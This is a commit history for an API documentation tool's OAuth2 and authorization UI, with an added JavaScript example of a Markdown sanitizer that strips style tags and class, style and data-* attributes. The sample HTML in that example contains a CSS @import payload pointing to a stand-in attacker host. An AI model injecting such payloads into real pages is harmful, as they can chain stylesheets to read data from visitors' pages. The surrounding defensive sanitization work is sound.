Commit Graph

32 Commits

Author SHA1 Message Date
Christian Egli
c6d8d779d0 feat: do not ask for client secret when using auth code with PKCE (#7438)
Co-authored-by: Ignacio Lozano <nacholozano@gmail.com>
Co-authored-by: Vladimir Gorej <vladimir.gorej@gmail.com>

Refs #6290
2022-01-26 10:56:09 +01:00
Tim Lai
21c29469bc refactor(auth): rename auth flow constants to be more descriptive (#7061) 2021-03-10 15:53:14 -08:00
Ilya Lipnitskiy
0807687f91 feat(auth): Add OIDC support (#3517) (#6549)
spec/actions.js: Add OIDC metadata fetching

components/auth/oauth2: Add OIDC URL to the Authorization popup
2020-12-09 10:11:33 -08:00
Tim Lai
0a807d6237 fix(auth): support for oauth2 relative url (#6546)
* Handle relative urls for oauth authorization

The full URL is computed based on the current selected server
if a relative URL is used as authorizationUrl
or tokenUrl


Co-authored-by: Eliot Berriot <contact@eliotberriot.com>
2020-10-21 15:46:31 -07:00
Adam Stachowicz
65ea764b61 fix: add autofocus to auth fields (#6483) 2020-10-14 19:23:19 -07:00
Amir Bitaraf Haghighi
96aecc8860 feat: Preserve authorization on browser refresh and close/reopen (#5939)
* Add default configuration `preserveAuthorization`

* Add localStorage to auth plugin

* Add persistAuthorization unit tests

* Refactor persistAuthorization to use wrapped actions

* Upgrade unit tests to be compatible with jest

* Add persistAuthorization documentation


Co-authored-by: Tim Lai <timothy.lai@gmail.com>
2020-09-11 14:05:37 -07:00
Vladimir Gorej
a616cb471d fix(Markdown): render markdown in a more secure way
This commit changes markdown sanitization behaviour in the following way:

class, style and data-* attributes are removed by default. These attributes
open possible vulnerability vectors to attackers.

The original behavior of the sanitizer (before this commit) can be enabled by the *useUnsafeMarkdown* configuration option.
Use this configuration option with caution and only in cases when you know
what you're doing.
2020-06-11 21:51:15 +02:00
Matthew Morrissette
275c8f2ccf improvement: oauth "scopes" improvements (#6037)
* improvement: oauth "scopes" init parameter

* improvement: add "select all" and "select none" to oauth scopes popup
2020-06-10 11:27:54 -07:00
dalbrx-forcam
44acf85d0d improvement: use type 'password' instead of text for client secret (#5262)
Co-authored-by: kyle shockey <kyleshockey@gmail.com>
2020-01-11 17:26:54 -05:00
kyle
5f6ec8ce1d fix: mitigate "sequential @import chaining" vulnerability (#5616)
* `test/e2e-cypress/tests/features/xss/` -> `test/e2e-cypress/tests/security`

* add tests

* filter <style> tags out of Markdown fields

* initialize OAuth inputs without applying `value` attribute
2019-09-20 13:19:08 -07:00
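The two Markdown hardening commits above (a616cb471d and 5f6ec8ce1d) describe a policy rather than show it: drop `<style>` elements, so Markdown cannot start a CSS `@import` chain, and strip `class`, `style` and `data-*` attributes unless `useUnsafeMarkdown` is set. The following block is an added illustration of that policy written for this page; it is not swagger-ui's code, and the function names, the option object and the sample HTML are assumptions. It is a token-based string filter kept small enough to read; a production sanitizer should operate on a parsed DOM rather than on regular expressions, since string matching can be confused by malformed markup. The second part of 5f6ec8ce1d (not writing OAuth secrets into `value` attributes) is not shown here; its point is that attribute values are visible to CSS attribute selectors, so keeping them out of the DOM removes the data an injected stylesheet could read.

```javascript
// Added example (not swagger-ui's own code): the sanitization policy described in
// commits a616cb471d and 5f6ec8ce1d, as a small token-based filter.
// (1) <style> elements are removed together with their CSS, so no @import chain
//     can be started from Markdown.
// (2) class, style and data-* attributes are stripped from every remaining tag.
// An option named after the page's `useUnsafeMarkdown` setting restores the
// original, unfiltered behaviour. Function and option names are assumptions.

// Attribute names dropped by default; data-* is matched by prefix, case-insensitively.
function isDroppedAttribute(name) {
  const n = name.toLowerCase();
  return n === "class" || n === "style" || n.startsWith("data-");
}

// Remove closed <style>...</style> blocks first, then any stray <style> start tag
// that was left unclosed (its CSS then renders as inert text instead of executing).
function stripStyleElements(html) {
  return html
    .replace(/<style\b[^>]*>[\s\S]*?<\/style\s*>/gi, "")
    .replace(/<style\b[^>]*>/gi, "");
}

// One HTML start tag with optional attributes (quoted or unquoted values) and an
// optional self-closing slash. End tags such as </p> do not match and pass through.
const START_TAG_RE =
  /<[a-zA-Z][\w:-]*(?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*\s*\/?>/g;

// Rebuild a single start tag, keeping only the attributes that survive the policy.
function sanitizeStartTag(tag) {
  const m = /^<([a-zA-Z][\w:-]*)([\s\S]*?)(\/?)>$/.exec(tag);
  if (!m) return tag;
  const [, name, attrText, selfClose] = m;
  const attrRe = /([^\s"'>\/=]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const kept = [];
  let a;
  while ((a = attrRe.exec(attrText)) !== null) {
    if (isDroppedAttribute(a[1])) continue;
    kept.push(a[2] === undefined ? a[1] : `${a[1]}=${a[2]}`);
  }
  return `<${name}${kept.length ? " " + kept.join(" ") : ""}${selfClose}>`;
}

// Entry point. `useUnsafeMarkdown` is an explicit opt-in that skips filtering,
// mirroring the configuration option named in commit a616cb471d.
function sanitizeMarkdownHtml(html, { useUnsafeMarkdown = false } = {}) {
  if (useUnsafeMarkdown) return html;
  return stripStyleElements(html).replace(START_TAG_RE, sanitizeStartTag);
}

// Constructed sample (not from the project): Markdown that rendered to HTML carrying
// a CSS payload and styling hooks. With the default policy only harmless attributes survive.
const SAMPLE_HTML =
  '<p class="note" style="color:red" data-track="1" title="ok">hi</p>' +
  '<style>@import url("https://attacker.example/step1.css");</style>' +
  '<a href="/docs" data-id="7">link</a><br/>';

console.log(sanitizeMarkdownHtml(SAMPLE_HTML));
// <p title="ok">hi</p><a href="/docs">link</a><br/>
```

The `useUnsafeMarkdown` path returns the input untouched, which is exactly why the commit message warns to enable it only when the Markdown source is trusted: every `class`, `style` and `data-*` hook, and every stylesheet, reaches the page as written.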
kyle
a5568f9e16 improve: OAuth2 UI and test suite (via #5066)
* create `features` folder

* add base oauth2 server

* continue implementing OAuth tests

* WIP

* add password flow tests

* modify Password flow credential types

* remove query string credential type

* add test case for Authorization flow

* add specific Authorization value for Password flow test

* WIP

* fix linter issues
2018-12-07 20:54:29 +01:00
Charles Capps
861cc65cff improve: add "Close" button to OAuth dialog, rename "Done" button elsewhere (#4212)
* Rename "Done" button to "Close", and add "Close" button to OAuth dialog
* move Close button to the right
2018-03-02 18:40:54 -08:00
Christoph Kappestein
774acb1f28 add flow to make scope checkbox id unique 2017-11-18 09:59:15 +01:00
Kyle Shockey
7c917325f0 Linter fixes 2017-10-20 19:31:52 -07:00
Kyle Shockey
d677e534c3 WIP 2017-10-13 21:23:45 -07:00
Kyle Shockey
8b81bcac48 OAS3 Auth MVP 2017-10-11 16:58:24 -07:00
RVKen
d36f0a6dbd fix eslint issues 2017-06-29 04:37:19 +02:00
Anna Bodnia
ee2e82390b fixes #3191 2017-06-08 15:41:06 +03:00
Anna Bodnia
36b263e230 fixes #3172 2017-06-08 12:19:47 +03:00
Kyle Shockey
6ccd037197 Merge branch 'bug/3163-markdown-xss' of github.com:shockey/swagger-ui into bug/3163-markdown-xss 2017-06-01 22:18:37 -07:00
Kyle Shockey
23b1a8aabd Finish rewiring Markdown provider 2017-06-01 21:41:28 -07:00
shockey
6ae7eb4591 Merge branch 'master' into bug/3163-markdown-xss 2017-06-01 09:47:12 -07:00
Kyle Shockey
df47e0e956 Disable HTML rendering in React-Markdown 2017-06-01 09:43:13 -07:00
Anna Bodnia
676fd99960 #3128 make request-body type default for oauth2 password flow 2017-05-31 18:53:45 +03:00
Anna Bodnia
8aebea34c4 add configuration of auth: scope separator, client id, client secret, app name, realm, additionalQueryParams 2017-05-11 16:30:30 +03:00
Stefan Grootscholten
073eff4e10 Make the checkbox id more unique.
If the swagger.json defines more than one oauth2 Security scheme with
matching scopes, the ids of the scope checkboxes were not unique.
As a result the scope for a second security scheme could not be
selected.

By adding the security scheme name to the id, it becomes more unique.
2017-05-04 09:39:22 +02:00
Anna Bodnia
bb73dd49d8 fixes password, application oauth2 flows 2017-04-26 17:50:09 +03:00
Anna Bodnia
5a260971cc fixes #2929 2017-04-21 13:29:18 +03:00
Mészáros Mihály
ae33b7f46a Implement application/client_credentials flow 2017-04-05 20:20:23 +02:00
Anna Bodnia
432cd7f965 #2774 display scopes for oauth2 password flow 2017-03-30 17:49:32 +03:00
Kyle Shockey
e1fcbfbf09 Linter error fixes 2017-03-23 16:36:45 -07:00
Ron
f22a628934 in with the new 2017-03-17 21:17:53 -07:00